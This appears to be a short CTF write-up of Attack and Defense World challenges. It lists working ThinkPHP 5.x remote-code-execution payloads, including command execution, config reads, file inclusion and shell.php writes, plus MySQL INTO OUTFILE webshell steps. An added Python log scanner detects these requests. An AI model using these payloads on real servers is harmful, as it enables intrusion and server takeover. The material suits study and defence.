Emmm, that Google CAPTCHA on BUU is so hard, I am probably a robot. I'll do some 攻防世界 (Attack and Defense World) challenges first…
php_rce
payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
Payload source: https://y4er.com/post/thinkphp5-rce/
5.0.x
?s=index/think\config/get&name=database.username // read configuration info
?s=index/\think\Lang/load&file=../../test.jpg // include an arbitrary file
?s=index/\think\Config/load&file=../../t.php // include an arbitrary .php file
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
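Every payload listed above for 5.0.x and 5.1.x puts a namespaced class name (a segment containing a backslash) into the `s` route parameter. The following is an added example, not part of the original post, showing a log check for that request shape. The sample log lines and the function names are constructed for illustration, and it assumes that legitimate routes on the site never contain a backslash and that the route arrives in the `s` query parameter.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?s=index/user/profile&id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 44',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?s=index|think\\config/get&name=database.username HTTP/1.1" 200 20',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=think%5Capp HTTP/1.1" 200 300',
]

# Client address, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def namespaced_segment(target):
    """Return the first s= route segment containing a backslash, else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in params.get("s", []):
        route = unquote(raw)  # second decode also catches double-encoded %255C
        for segment in re.split(r"[/|]", route):
            if "\\" in segment:
                return segment
    return None


def scan(lines):
    """Return (client_ip, offending_segment) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        segment = namespaced_segment(m.group(2))
        if segment is not None:
            hits.append((m.group(1), segment))
    return hits


if __name__ == "__main__":
    for ip, segment in scan(SAMPLE_LOG):
        print(f"{ip} requested class segment {segment!r}")
```

Routes delivered through PATH_INFO or a POST body do not appear in the query string and need a separate check.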
Web_php_include
SHOW VARIABLES LIKE "secure_file_priv" (if it is NULL, writing is not possible)
SELECT "PHP one-liner" INTO OUTFILE 'path'
Then use file inclusion.